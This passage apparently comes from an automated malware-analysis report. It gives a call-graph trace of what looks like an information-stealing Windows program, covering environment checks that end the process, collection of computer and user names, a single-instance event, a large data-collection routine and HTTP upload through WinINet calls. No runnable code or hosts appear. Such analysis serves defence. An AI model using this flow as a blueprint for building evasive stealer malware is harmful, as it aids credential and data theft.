• e61c03: lstrcpy (e61c29); then ExitProcess (e61c65) or GetSystemInfo (e61c6d), which itself leads either to ExitProcess (e61c7d) or onward.
• e41030: GetCurrentProcess, VirtualAllocExNuma; then ExitProcess (e41057) or VirtualAlloc (e4105e), VirtualFree (e4108a), GlobalMemoryStatusEx (e410d0); then ExitProcess (e41112) or GetUserDefaultLangID (e4111a).
• e61ca2: ExitProcess (e61cb0) or e62ad0 (GetProcessHeap, RtlAllocateHeap, GetComputerNameA) and e62a40 (GetProcessHeap, RtlAllocateHeap, GetUserNameA), with ExitProcess reachable at e61ce0; both are called a second time at e61d5a and e61dce, interleaved with lstrlen / lstrcpy / lstrcat string building.
• e61e56: OpenEventA; while the event exists, CloseHandle, Sleep, OpenEventA in a loop (e61e68); then CreateEventA (e61e8c).
• e61b20: GetSystemTime, string building in e61820 (lstrlen / lstrcpy / lstrcat), sscanf (e61b81), two SystemTimeToFileTime calls (e42a24); then ExitProcess (e61be2) or e5ffd0.
• e5ffd0 and e60540 through e60e95, the collection routine: lstrcpy / lstrlen / lstrcat with e61570, e62740 (GetWindowsDirectoryA), e44c50, e58ca0 (StrCmpCA), repeated calls to e41530 (8 API calls) and e460d0 (80 API calls), e581b0 (10), e57ee0 (lstrlen, lstrcpy, StrCmpCA x3), e58050 (lstrlen, lstrcpy, StrCmpCA, lstrlen, lstrcpy), e45640 (8), e57280 (1498), e583e0 (7), e424e0 (230), e585b0 (47), e5c840 (70), e5d0f0 (118), e5d7b0 (103, __crtGetStringTypeA_stat), e5dfa0 (149), e5e500 (108), e5e720 (120), e5e9e0 (110), e47bc0 (154), e5eb70 (108), e5ecb0 (98), e641e0 (91), e61660 (12).
• e61ea5: CloseHandle, ExitProcess.

A second pass at e42e70 (called from e6028e) invokes e44a60 (RtlAllocateHeap, VirtualProtect) repeatedly as well; the node listing is cut off while still inside that sequence.
26709 e43996 26708->26709 26710 e44a60 2 API calls 26709->26710 26711 e439af 26710->26711 26712 e44a60 2 API calls 26711->26712 26713 e439c5 26712->26713 26714 e44a60 2 API calls 26713->26714 26715 e439db 26714->26715 26716 e44a60 2 API calls 26715->26716 26717 e439f1 26716->26717 26718 e44a60 2 API calls 26717->26718 26719 e43a07 26718->26719 26720 e44a60 2 API calls 26719->26720 26721 e43a1d 26720->26721 26722 e44a60 2 API calls 26721->26722 26723 e43a36 26722->26723 26724 e44a60 2 API calls 26723->26724 26725 e43a4c 26724->26725 26726 e44a60 2 API calls 26725->26726 26727 e43a62 26726->26727 26728 e44a60 2 API calls 26727->26728 26729 e43a78 26728->26729 26730 e44a60 2 API calls 26729->26730 26731 e43a8e 26730->26731 26732 e44a60 2 API calls 26731->26732 26733 e43aa4 26732->26733 26734 e44a60 2 API calls 26733->26734 26735 e43abd 26734->26735 26736 e44a60 2 API calls 26735->26736 26737 e43ad3 26736->26737 26738 e44a60 2 API calls 26737->26738 26739 e43ae9 26738->26739 26740 e44a60 2 API calls 26739->26740 26741 e43aff 26740->26741 26742 e44a60 2 API calls 26741->26742 26743 e43b15 26742->26743 26744 e44a60 2 API calls 26743->26744 26745 e43b2b 26744->26745 26746 e44a60 2 API calls 26745->26746 26747 e43b44 26746->26747 26748 e44a60 2 API calls 26747->26748 26749 e43b5a 26748->26749 26750 e44a60 2 API calls 26749->26750 26751 e43b70 26750->26751 26752 e44a60 2 API calls 26751->26752 26753 e43b86 26752->26753 26754 e44a60 2 API calls 26753->26754 26755 e43b9c 26754->26755 26756 e44a60 2 API calls 26755->26756 26757 e43bb2 26756->26757 26758 e44a60 2 API calls 26757->26758 26759 e43bcb 26758->26759 26760 e44a60 2 API calls 26759->26760 26761 e43be1 26760->26761 26762 e44a60 2 API calls 26761->26762 26763 e43bf7 26762->26763 26764 e44a60 2 API calls 26763->26764 26765 e43c0d 26764->26765 26766 e44a60 2 API calls 26765->26766 26767 e43c23 26766->26767 26768 e44a60 2 API calls 26767->26768 26769 e43c39 26768->26769 26770 e44a60 2 API calls 26769->26770 26771 e43c52 
26770->26771 26772 e44a60 2 API calls 26771->26772 26773 e43c68 26772->26773 26774 e44a60 2 API calls 26773->26774 26775 e43c7e 26774->26775 26776 e44a60 2 API calls 26775->26776 26777 e43c94 26776->26777 26778 e44a60 2 API calls 26777->26778 26779 e43caa 26778->26779 26780 e44a60 2 API calls 26779->26780 26781 e43cc0 26780->26781 26782 e44a60 2 API calls 26781->26782 26783 e43cd9 26782->26783 26784 e44a60 2 API calls 26783->26784 26785 e43cef 26784->26785 26786 e44a60 2 API calls 26785->26786 26787 e43d05 26786->26787 26788 e44a60 2 API calls 26787->26788 26789 e43d1b 26788->26789 26790 e44a60 2 API calls 26789->26790 26791 e43d31 26790->26791 26792 e44a60 2 API calls 26791->26792 26793 e43d47 26792->26793 26794 e44a60 2 API calls 26793->26794 26795 e43d60 26794->26795 26796 e44a60 2 API calls 26795->26796 26797 e43d76 26796->26797 26798 e44a60 2 API calls 26797->26798 26799 e43d8c 26798->26799 26800 e44a60 2 API calls 26799->26800 26801 e43da2 26800->26801 26802 e44a60 2 API calls 26801->26802 26803 e43db8 26802->26803 26804 e44a60 2 API calls 26803->26804 26805 e43dce 26804->26805 26806 e44a60 2 API calls 26805->26806 26807 e43de7 26806->26807 26808 e44a60 2 API calls 26807->26808 26809 e43dfd 26808->26809 26810 e44a60 2 API calls 26809->26810 26811 e43e13 26810->26811 26812 e44a60 2 API calls 26811->26812 26813 e43e29 26812->26813 26814 e44a60 2 API calls 26813->26814 26815 e43e3f 26814->26815 26816 e44a60 2 API calls 26815->26816 26817 e43e55 26816->26817 26818 e44a60 2 API calls 26817->26818 26819 e43e6e 26818->26819 26820 e44a60 2 API calls 26819->26820 26821 e43e84 26820->26821 26822 e44a60 2 API calls 26821->26822 26823 e43e9a 26822->26823 26824 e44a60 2 API calls 26823->26824 26825 e43eb0 26824->26825 26826 e44a60 2 API calls 26825->26826 26827 e43ec6 26826->26827 26828 e44a60 2 API calls 26827->26828 26829 e43edc 26828->26829 26830 e44a60 2 API calls 26829->26830 26831 e43ef5 26830->26831 26832 e44a60 2 API calls 26831->26832 26833 e43f0b 26832->26833 
26834 e44a60 2 API calls 26833->26834 26835 e43f21 26834->26835 26836 e44a60 2 API calls 26835->26836 26837 e43f37 26836->26837 26838 e44a60 2 API calls 26837->26838 26839 e43f4d 26838->26839 26840 e44a60 2 API calls 26839->26840 26841 e43f63 26840->26841 26842 e44a60 2 API calls 26841->26842 26843 e43f7c 26842->26843 26844 e44a60 2 API calls 26843->26844 26845 e43f92 26844->26845 26846 e44a60 2 API calls 26845->26846 26847 e43fa8 26846->26847 26848 e44a60 2 API calls 26847->26848 26849 e43fbe 26848->26849 26850 e44a60 2 API calls 26849->26850 26851 e43fd4 26850->26851 26852 e44a60 2 API calls 26851->26852 26853 e43fea 26852->26853 26854 e44a60 2 API calls 26853->26854 26855 e44003 26854->26855 26856 e44a60 2 API calls 26855->26856 26857 e44019 26856->26857 26858 e44a60 2 API calls 26857->26858 26859 e4402f 26858->26859 26860 e44a60 2 API calls 26859->26860 26861 e44045 26860->26861 26862 e44a60 2 API calls 26861->26862 26863 e4405b 26862->26863 26864 e44a60 2 API calls 26863->26864 26865 e44071 26864->26865 26866 e44a60 2 API calls 26865->26866 26867 e4408a 26866->26867 26868 e44a60 2 API calls 26867->26868 26869 e440a0 26868->26869 26870 e44a60 2 API calls 26869->26870 26871 e440b6 26870->26871 26872 e44a60 2 API calls 26871->26872 26873 e440cc 26872->26873 26874 e44a60 2 API calls 26873->26874 26875 e440e2 26874->26875 26876 e44a60 2 API calls 26875->26876 26877 e440f8 26876->26877 26878 e44a60 2 API calls 26877->26878 26879 e44111 26878->26879 26880 e44a60 2 API calls 26879->26880 26881 e44127 26880->26881 26882 e44a60 2 API calls 26881->26882 26883 e4413d 26882->26883 26884 e44a60 2 API calls 26883->26884 26885 e44153 26884->26885 26886 e44a60 2 API calls 26885->26886 26887 e44169 26886->26887 26888 e44a60 2 API calls 26887->26888 26889 e4417f 26888->26889 26890 e44a60 2 API calls 26889->26890 26891 e44198 26890->26891 26892 e44a60 2 API calls 26891->26892 26893 e441ae 26892->26893 26894 e44a60 2 API calls 26893->26894 26895 e441c4 26894->26895 26896 e44a60 2 
API calls 26895->26896 26897 e441da 26896->26897 26898 e44a60 2 API calls 26897->26898 26899 e441f0 26898->26899 26900 e44a60 2 API calls 26899->26900 26901 e44206 26900->26901 26902 e44a60 2 API calls 26901->26902 26903 e4421f 26902->26903 26904 e44a60 2 API calls 26903->26904 26905 e44235 26904->26905 26906 e44a60 2 API calls 26905->26906 26907 e4424b 26906->26907 26908 e44a60 2 API calls 26907->26908 26909 e44261 26908->26909 26910 e44a60 2 API calls 26909->26910 26911 e44277 26910->26911 26912 e44a60 2 API calls 26911->26912 26913 e4428d 26912->26913 26914 e44a60 2 API calls 26913->26914 26915 e442a6 26914->26915 26916 e44a60 2 API calls 26915->26916 26917 e442bc 26916->26917 26918 e44a60 2 API calls 26917->26918 26919 e442d2 26918->26919 26920 e44a60 2 API calls 26919->26920 26921 e442e8 26920->26921 26922 e44a60 2 API calls 26921->26922 26923 e442fe 26922->26923 26924 e44a60 2 API calls 26923->26924 26925 e44314 26924->26925 26926 e44a60 2 API calls 26925->26926 26927 e4432d 26926->26927 26928 e44a60 2 API calls 26927->26928 26929 e44343 26928->26929 26930 e44a60 2 API calls 26929->26930 26931 e44359 26930->26931 26932 e44a60 2 API calls 26931->26932 26933 e4436f 26932->26933 26934 e44a60 2 API calls 26933->26934 26935 e44385 26934->26935 26936 e44a60 2 API calls 26935->26936 26937 e4439b 26936->26937 26938 e44a60 2 API calls 26937->26938 26939 e443b4 26938->26939 26940 e44a60 2 API calls 26939->26940 26941 e443ca 26940->26941 26942 e44a60 2 API calls 26941->26942 26943 e443e0 26942->26943 26944 e44a60 2 API calls 26943->26944 26945 e443f6 26944->26945 26946 e44a60 2 API calls 26945->26946 26947 e4440c 26946->26947 26948 e44a60 2 API calls 26947->26948 26949 e44422 26948->26949 26950 e44a60 2 API calls 26949->26950 26951 e4443b 26950->26951 26952 e44a60 2 API calls 26951->26952 26953 e44451 26952->26953 26954 e44a60 2 API calls 26953->26954 26955 e44467 26954->26955 26956 e44a60 2 API calls 26955->26956 26957 e4447d 26956->26957 26958 e44a60 2 API calls 
26957->26958 26959 e44493 26958->26959 26960 e44a60 2 API calls 26959->26960 26961 e444a9 26960->26961 26962 e44a60 2 API calls 26961->26962 26963 e444c2 26962->26963 26964 e44a60 2 API calls 26963->26964 26965 e444d8 26964->26965 26966 e44a60 2 API calls 26965->26966 26967 e444ee 26966->26967 26968 e44a60 2 API calls 26967->26968 26969 e44504 26968->26969 26970 e44a60 2 API calls 26969->26970 26971 e4451a 26970->26971 26972 e44a60 2 API calls 26971->26972 26973 e44530 26972->26973 26974 e44a60 2 API calls 26973->26974 26975 e44549 26974->26975 26976 e44a60 2 API calls 26975->26976 26977 e4455f 26976->26977 26978 e44a60 2 API calls 26977->26978 26979 e44575 26978->26979 26980 e44a60 2 API calls 26979->26980 26981 e4458b 26980->26981 26982 e44a60 2 API calls 26981->26982 26983 e445a1 26982->26983 26984 e44a60 2 API calls 26983->26984 26985 e445b7 26984->26985 26986 e44a60 2 API calls 26985->26986 26987 e445d0 26986->26987 26988 e44a60 2 API calls 26987->26988 26989 e445e6 26988->26989 26990 e44a60 2 API calls 26989->26990 26991 e445fc 26990->26991 26992 e44a60 2 API calls 26991->26992 26993 e44612 26992->26993 26994 e44a60 2 API calls 26993->26994 26995 e44628 26994->26995 26996 e44a60 2 API calls 26995->26996 26997 e4463e 26996->26997 26998 e44a60 2 API calls 26997->26998 26999 e44657 26998->26999 27000 e44a60 2 API calls 26999->27000 27001 e4466d 27000->27001 27002 e44a60 2 API calls 27001->27002 27003 e44683 27002->27003 27004 e44a60 2 API calls 27003->27004 27005 e44699 27004->27005 27006 e44a60 2 API calls 27005->27006 27007 e446af 27006->27007 27008 e44a60 2 API calls 27007->27008 27009 e446c5 27008->27009 27010 e44a60 2 API calls 27009->27010 27011 e446de 27010->27011 27012 e44a60 2 API calls 27011->27012 27013 e446f4 27012->27013 27014 e44a60 2 API calls 27013->27014 27015 e4470a 27014->27015 27016 e44a60 2 API calls 27015->27016 27017 e44720 27016->27017 27018 e44a60 2 API calls 27017->27018 27019 e44736 27018->27019 27020 e44a60 2 API calls 27019->27020 
27021 e4474c 27020->27021 27022 e44a60 2 API calls 27021->27022 27023 e44765 27022->27023 27024 e44a60 2 API calls 27023->27024 27025 e4477b 27024->27025 27026 e44a60 2 API calls 27025->27026 27027 e44791 27026->27027 27028 e44a60 2 API calls 27027->27028 27029 e447a7 27028->27029 27030 e44a60 2 API calls 27029->27030 27031 e447bd 27030->27031 27032 e44a60 2 API calls 27031->27032 27033 e447d3 27032->27033 27034 e44a60 2 API calls 27033->27034 27035 e447ec 27034->27035 27036 e44a60 2 API calls 27035->27036 27037 e44802 27036->27037 27038 e44a60 2 API calls 27037->27038 27039 e44818 27038->27039 27040 e44a60 2 API calls 27039->27040 27041 e4482e 27040->27041 27042 e44a60 2 API calls 27041->27042 27043 e44844 27042->27043 27044 e44a60 2 API calls 27043->27044 27045 e4485a 27044->27045 27046 e44a60 2 API calls 27045->27046 27047 e44873 27046->27047 27048 e44a60 2 API calls 27047->27048 27049 e44889 27048->27049 27050 e44a60 2 API calls 27049->27050 27051 e4489f 27050->27051 27052 e44a60 2 API calls 27051->27052 27053 e448b5 27052->27053 27054 e44a60 2 API calls 27053->27054 27055 e448cb 27054->27055 27056 e44a60 2 API calls 27055->27056 27057 e448e1 27056->27057 27058 e44a60 2 API calls 27057->27058 27059 e448fa 27058->27059 27060 e44a60 2 API calls 27059->27060 27061 e44910 27060->27061 27062 e44a60 2 API calls 27061->27062 27063 e44926 27062->27063 27064 e44a60 2 API calls 27063->27064 27065 e4493c 27064->27065 27066 e44a60 2 API calls 27065->27066 27067 e44952 27066->27067 27068 e44a60 2 API calls 27067->27068 27069 e44968 27068->27069 27070 e44a60 2 API calls 27069->27070 27071 e44981 27070->27071 27072 e44a60 2 API calls 27071->27072 27073 e44997 27072->27073 27074 e44a60 2 API calls 27073->27074 27075 e449ad 27074->27075 27076 e44a60 2 API calls 27075->27076 27077 e449c3 27076->27077 27078 e44a60 2 API calls 27077->27078 27079 e449d9 27078->27079 27080 e44a60 2 API calls 27079->27080 27081 e449ef 27080->27081 27082 e44a60 2 API calls 27081->27082 27083 e44a08 
27082->27083 27084 e44a60 2 API calls 27083->27084 27085 e44a1e 27084->27085 27086 e44a60 2 API calls 27085->27086 27087 e44a34 27086->27087 27088 e44a60 2 API calls 27087->27088 27089 e44a4a 27088->27089 27090 e666e0 27089->27090 27091 e66afe 8 API calls 27090->27091 27092 e666ed 43 API calls 27090->27092 27093 e66b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27091->27093 27094 e66c08 27091->27094 27092->27091 27093->27094 27095 e66c15 8 API calls 27094->27095 27096 e66cd2 27094->27096 27095->27096 27097 e66d4f 27096->27097 27098 e66cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27096->27098 27099 e66d5c 6 API calls 27097->27099 27100 e66de9 27097->27100 27098->27097 27099->27100 27101 e66df6 12 API calls 27100->27101 27102 e66f10 27100->27102 27101->27102 27103 e66f8d 27102->27103 27104 e66f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27102->27104 27105 e66f96 GetProcAddress GetProcAddress 27103->27105 27106 e66fc1 27103->27106 27104->27103 27105->27106 27107 e66ff5 27106->27107 27108 e66fca GetProcAddress GetProcAddress 27106->27108 27109 e67002 10 API calls 27107->27109 27110 e670ed 27107->27110 27108->27107 27109->27110 27111 e670f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27110->27111 27112 e67152 27110->27112 27111->27112 27113 e6716e 27112->27113 27114 e6715b GetProcAddress 27112->27114 27115 e67177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27113->27115 27116 e6051f 27113->27116 27114->27113 27115->27116 27117 e41530 27116->27117 27426 e41610 27117->27426 27119 e4153b 27120 e41555 lstrcpy 27119->27120 27121 e4155d 27119->27121 27120->27121 27122 e41577 lstrcpy 27121->27122 27123 e4157f 27121->27123 27122->27123 27124 e41599 lstrcpy 27123->27124 27125 e415a1 27123->27125 27124->27125 27126 e41605 27125->27126 27127 e415fd lstrcpy 27125->27127 27128 e5f1b0 lstrlen 27126->27128 27127->27126 27129 e5f1e4 27128->27129 27130 
e5f1f7 lstrlen 27129->27130 27131 e5f1eb lstrcpy 27129->27131 27132 e5f208 27130->27132 27131->27130 27133 e5f20f lstrcpy 27132->27133 27134 e5f21b lstrlen 27132->27134 27133->27134 27135 e5f22c 27134->27135 27136 e5f233 lstrcpy 27135->27136 27137 e5f23f 27135->27137 27136->27137 27138 e5f258 lstrcpy 27137->27138 27139 e5f264 27137->27139 27138->27139 27140 e5f286 lstrcpy 27139->27140 27141 e5f292 27139->27141 27140->27141 27142 e5f2ba lstrcpy 27141->27142 27143 e5f2c6 27141->27143 27142->27143 27144 e5f2ea lstrcpy 27143->27144 27192 e5f300 27143->27192 27144->27192 27145 e5f30c lstrlen 27145->27192 27146 e5f4b9 lstrcpy 27146->27192 27147 e5f3a1 lstrcpy 27147->27192 27148 e5f3c5 lstrcpy 27148->27192 27149 e41530 8 API calls 27149->27192 27150 e5f4e8 lstrcpy 27193 e5f4f0 27150->27193 27151 e5f479 lstrcpy 27151->27192 27152 e5f59c lstrcpy 27152->27193 27153 e5f70f StrCmpCA 27158 e5fe8e 27153->27158 27153->27192 27154 e5f616 StrCmpCA 27154->27153 27154->27193 27155 e5fa29 StrCmpCA 27165 e5fe2b 27155->27165 27155->27192 27156 e5f73e lstrlen 27156->27192 27157 e5fd4d StrCmpCA 27160 e5fd60 Sleep 27157->27160 27171 e5fd75 27157->27171 27159 e5fead lstrlen 27158->27159 27163 e5fea5 lstrcpy 27158->27163 27164 e5fec7 27159->27164 27160->27192 27161 e5fa58 lstrlen 27161->27192 27162 e5f64a lstrcpy 27162->27193 27163->27159 27169 e5fee7 lstrlen 27164->27169 27174 e5fedf lstrcpy 27164->27174 27166 e5fe4a lstrlen 27165->27166 27167 e5fe42 lstrcpy 27165->27167 27173 e5fe64 27166->27173 27167->27166 27168 e5f89e lstrcpy 27168->27192 27183 e5ff01 27169->27183 27170 e5fd94 lstrlen 27185 e5fdae 27170->27185 27171->27170 27175 e5fd8c lstrcpy 27171->27175 27172 e5f76f lstrcpy 27172->27192 27178 e5fdce lstrlen 27173->27178 27179 e5fe7c lstrcpy 27173->27179 27174->27169 27175->27170 27176 e5fbb8 lstrcpy 27176->27192 27177 e5fa89 lstrcpy 27177->27192 27194 e5fde8 27178->27194 27179->27178 27180 e5f791 lstrcpy 27180->27192 27182 e5f8cd lstrcpy 27182->27193 27184 e5ff21 27183->27184 27187 
e5ff19 lstrcpy 27183->27187 27188 e41610 4 API calls 27184->27188 27185->27178 27191 e5fdc6 lstrcpy 27185->27191 27186 e5fbe7 lstrcpy 27186->27193 27187->27184 27212 e5fe13 27188->27212 27189 e5faab lstrcpy 27189->27192 27190 e5f698 lstrcpy 27190->27193 27191->27178 27192->27145 27192->27146 27192->27147 27192->27148 27192->27149 27192->27150 27192->27151 27192->27153 27192->27155 27192->27156 27192->27157 27192->27161 27192->27168 27192->27172 27192->27176 27192->27177 27192->27180 27192->27182 27192->27186 27192->27189 27192->27193 27196 e5ee90 28 API calls 27192->27196 27200 e5f7e2 lstrcpy 27192->27200 27203 e5fafc lstrcpy 27192->27203 27193->27152 27193->27154 27193->27155 27193->27157 27193->27162 27193->27190 27193->27192 27197 e5efb0 35 API calls 27193->27197 27201 e5f924 lstrcpy 27193->27201 27202 e5f99e StrCmpCA 27193->27202 27204 e5fc3e lstrcpy 27193->27204 27205 e5fcb8 StrCmpCA 27193->27205 27206 e5f9cb lstrcpy 27193->27206 27207 e41530 8 API calls 27193->27207 27208 e5fce9 lstrcpy 27193->27208 27209 e5ee90 28 API calls 27193->27209 27210 e5fa19 lstrcpy 27193->27210 27211 e5fd3a lstrcpy 27193->27211 27195 e5fe08 27194->27195 27198 e5fe00 lstrcpy 27194->27198 27199 e41610 4 API calls 27195->27199 27196->27192 27197->27193 27198->27195 27199->27212 27200->27192 27201->27193 27202->27155 27202->27193 27203->27192 27204->27193 27205->27157 27205->27193 27206->27193 27207->27193 27208->27193 27209->27193 27210->27193 27211->27193 27212->26236 27214 e62785 27213->27214 27215 e6278c GetVolumeInformationA 27213->27215 27214->27215 27216 e627ec GetProcessHeap RtlAllocateHeap 27215->27216 27218 e62826 wsprintfA 27216->27218 27219 e62822 27216->27219 27218->27219 27436 e671e0 27219->27436 27223 e44c70 27222->27223 27224 e44c85 27223->27224 27225 e44c7d lstrcpy 27223->27225 27440 e44bc0 27224->27440 27225->27224 27227 e44c90 27228 e44ccc lstrcpy 27227->27228 27229 e44cd8 27227->27229 27228->27229 27230 e44cff lstrcpy 27229->27230 27231 e44d0b 27229->27231 
27230->27231 27232 e44d2f lstrcpy 27231->27232 27233 e44d3b 27231->27233 27232->27233 27234 e44d6d lstrcpy 27233->27234 27235 e44d79 27233->27235 27234->27235 27236 e44da0 lstrcpy 27235->27236 27237 e44dac InternetOpenA StrCmpCA 27235->27237 27236->27237 27238 e44de0 27237->27238 27239 e454b8 InternetCloseHandle CryptStringToBinaryA 27238->27239 27444 e63e70 27238->27444 27240 e454e8 LocalAlloc 27239->27240 27260 e455d8 27239->27260 27242 e454ff CryptStringToBinaryA 27240->27242 27240->27260 27243 e45517 LocalFree 27242->27243 27244 e45529 lstrlen 27242->27244 27243->27260 27246 e4553d 27244->27246 27245 e44dfa 27249 e44e23 lstrcpy lstrcat 27245->27249 27250 e44e38 27245->27250 27247 e45557 lstrcpy 27246->27247 27248 e45563 lstrlen 27246->27248 27247->27248 27252 e4557d 27248->27252 27249->27250 27251 e44e5a lstrcpy 27250->27251 27254 e44e62 27250->27254 27251->27254 27253 e4558f lstrcpy lstrcat 27252->27253 27256 e455a2 27252->27256 27253->27256 27255 e44e71 lstrlen 27254->27255 27258 e44e89 27255->27258 27257 e455d1 27256->27257 27259 e455c9 lstrcpy 27256->27259 27257->27260 27261 e44e95 lstrcpy lstrcat 27258->27261 27262 e44eac 27258->27262 27259->27257 27260->26265 27261->27262 27263 e44ed5 27262->27263 27264 e44ecd lstrcpy 27262->27264 27265 e44edc lstrlen 27263->27265 27264->27263 27266 e44ef2 27265->27266 27267 e44efe lstrcpy lstrcat 27266->27267 27268 e44f15 27266->27268 27267->27268 27269 e44f36 lstrcpy 27268->27269 27270 e44f3e 27268->27270 27269->27270 27271 e44f65 lstrcpy lstrcat 27270->27271 27272 e44f7b 27270->27272 27271->27272 27273 e44fa4 27272->27273 27274 e44f9c lstrcpy 27272->27274 27275 e44fab lstrlen 27273->27275 27274->27273 27276 e44fc1 27275->27276 27277 e44fcd lstrcpy lstrcat 27276->27277 27278 e44fe4 27276->27278 27277->27278 27279 e4500d 27278->27279 27280 e45005 lstrcpy 27278->27280 27281 e45014 lstrlen 27279->27281 27280->27279 27282 e4502a 27281->27282 27283 e45036 lstrcpy lstrcat 27282->27283 27284 e4504d 27282->27284 27283->27284 
27285 e45079 27284->27285 27286 e45071 lstrcpy 27284->27286 27287 e45080 lstrlen 27285->27287 27286->27285 27288 e4509b 27287->27288 27289 e450ac lstrcpy lstrcat 27288->27289 27290 e450bc 27288->27290 27289->27290 27291 e450da lstrcpy lstrcat 27290->27291 27292 e450ed 27290->27292 27291->27292 27293 e4510b lstrcpy 27292->27293 27294 e45113 27292->27294 27293->27294 27295 e45121 InternetConnectA 27294->27295 27295->27239 27296 e45150 HttpOpenRequestA 27295->27296 27297 e454b1 InternetCloseHandle 27296->27297 27298 e4518b 27296->27298 27297->27239 27451 e67310 lstrlen 27298->27451 27302 e451a4 27459 e672c0 27302->27459 27305 e67280 lstrcpy 27306 e451c0 27305->27306 27307 e67310 3 API calls 27306->27307 27308 e451d5 27307->27308 27309 e67280 lstrcpy 27308->27309 27310 e451de 27309->27310 27311 e67310 3 API calls 27310->27311 27312 e451f4 27311->27312 27313 e67280 lstrcpy 27312->27313 27314 e451fd 27313->27314 27315 e67310 3 API calls 27314->27315 27316 e45213 27315->27316 27317 e67280 lstrcpy 27316->27317 27318 e4521c 27317->27318 27319 e67310 3 API calls 27318->27319 27320 e45231 27319->27320 27321 e67280 lstrcpy 27320->27321 27322 e4523a 27321->27322 27323 e672c0 2 API calls 27322->27323 27324 e4524d 27323->27324 27325 e67280 lstrcpy 27324->27325 27326 e45256 27325->27326 27327 e67310 3 API calls 27326->27327 27328 e4526b 27327->27328 27329 e67280 lstrcpy 27328->27329 27330 e45274 27329->27330 27331 e67310 3 API calls 27330->27331 27332 e45289 27331->27332 27333 e67280 lstrcpy 27332->27333 27334 e45292 27333->27334 27335 e672c0 2 API calls 27334->27335 27336 e452a5 27335->27336 27337 e67280 lstrcpy 27336->27337 27338 e452ae 27337->27338 27339 e67310 3 API calls 27338->27339 27340 e452c3 27339->27340 27341 e67280 lstrcpy 27340->27341 27342 e452cc 27341->27342 27343 e67310 3 API calls 27342->27343 27344 e452e2 27343->27344 27345 e67280 lstrcpy 27344->27345 27346 e452eb 27345->27346 27347 e67310 3 API calls 27346->27347 27348 e45301 27347->27348 27349 e67280 lstrcpy 
27348->27349 27350 e4530a 27349->27350 27351 e67310 3 API calls 27350->27351 27352 e4531f 27351->27352 27353 e67280 lstrcpy 27352->27353 27354 e45328 27353->27354 27355 e672c0 2 API calls 27354->27355 27356 e4533b 27355->27356 27357 e67280 lstrcpy 27356->27357 27358 e45344 27357->27358 27359 e45370 lstrcpy 27358->27359 27360 e4537c 27358->27360 27359->27360 27361 e672c0 2 API calls 27360->27361 27362 e4538a 27361->27362 27363 e672c0 2 API calls 27362->27363 27364 e45397 27363->27364 27365 e67280 lstrcpy 27364->27365 27366 e453a1 27365->27366 27367 e453b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27366->27367 27368 e4549c InternetCloseHandle 27367->27368 27372 e453f2 27367->27372 27370 e454ae 27368->27370 27369 e453fd lstrlen 27369->27372 27370->27297 27371 e4542e lstrcpy lstrcat 27371->27372 27372->27368 27372->27369 27372->27371 27373 e45473 27372->27373 27374 e4546b lstrcpy 27372->27374 27375 e4547a InternetReadFile 27373->27375 27374->27373 27375->27368 27375->27372 27377 e58cc6 ExitProcess 27376->27377 27378 e58ccd 27376->27378 27379 e58ee2 27378->27379 27380 e58d84 StrCmpCA 27378->27380 27381 e58da4 StrCmpCA 27378->27381 27382 e58d06 lstrlen 27378->27382 27383 e58e6f StrCmpCA 27378->27383 27384 e58e88 lstrlen 27378->27384 27385 e58e56 StrCmpCA 27378->27385 27386 e58d30 lstrlen 27378->27386 27387 e58dbd StrCmpCA 27378->27387 27388 e58ddd StrCmpCA 27378->27388 27389 e58dfd StrCmpCA 27378->27389 27390 e58e1d StrCmpCA 27378->27390 27391 e58e3d StrCmpCA 27378->27391 27392 e58d5a lstrlen 27378->27392 27393 e58ebb lstrcpy 27378->27393 27379->26267 27380->27378 27381->27378 27382->27378 27383->27378 27384->27378 27385->27378 27386->27378 27387->27378 27388->27378 27389->27378 27390->27378 27391->27378 27392->27378 27393->27378 27394->26273 27395->26275 27396->26281 27397->26283 27398->26289 27399->26291 27400->26297 27401->26301 27402->26307 27403->26309 27404->26313 27405->26327 27406->26331 27407->26330 27408->26325 27409->26330 27410->26348 27411->26333 
27412->26336 27413->26337 27414->26344 27415->26345 27416->26351 27417->26358 27418->26360 27419->26384 27420->26388 27421->26387 27422->26383 27423->26387 27424->26397 27427 e4161f 27426->27427 27428 e4162b lstrcpy 27427->27428 27429 e41633 27427->27429 27428->27429 27430 e4164d lstrcpy 27429->27430 27432 e41655 27429->27432 27430->27432 27431 e41677 27434 e41699 27431->27434 27435 e41691 lstrcpy 27431->27435 27432->27431 27433 e4166f lstrcpy 27432->27433 27433->27431 27434->27119 27435->27434 27437 e671e6 27436->27437 27438 e62860 27437->27438 27439 e671fc lstrcpy 27437->27439 27438->26262 27439->27438 27441 e44bd0 27440->27441 27441->27441 27442 e44bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27441->27442 27443 e44c41 27442->27443 27443->27227 27445 e63e83 27444->27445 27446 e63e9f lstrcpy 27445->27446 27447 e63eab 27445->27447 27446->27447 27448 e63ed5 GetSystemTime 27447->27448 27449 e63ecd lstrcpy 27447->27449 27450 e63ef3 27448->27450 27449->27448 27450->27245 27453 e6732d 27451->27453 27452 e4519b 27455 e67280 27452->27455 27453->27452 27454 e6733d lstrcpy lstrcat 27453->27454 27454->27452 27456 e6728c 27455->27456 27457 e672b4 27456->27457 27458 e672ac lstrcpy 27456->27458 27457->27302 27458->27457 27460 e672dc 27459->27460 27461 e451b7 27460->27461 27462 e672ed lstrcpy lstrcat 27460->27462 27461->27305 27462->27461 27487 e631f0 GetSystemInfo wsprintfA 27477 e68471 120 API calls 2 library calls 27463 e5e0f9 140 API calls 27514 e56b79 138 API calls 27479 e48c79 strcpy_s 27496 e5f2f8 93 API calls 27505 e4bbf9 90 API calls 27515 e41b64 162 API calls 27516 e58615 49 API calls 27464 e63cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27506 e633c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27481 e5e049 147 API calls 27507 e58615 48 API calls 27482 e62853 lstrcpy 27465 e62cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27488 e501d9 126 API calls 27493 e53959 244 API calls 27500 e48e20 strcpy_s free 
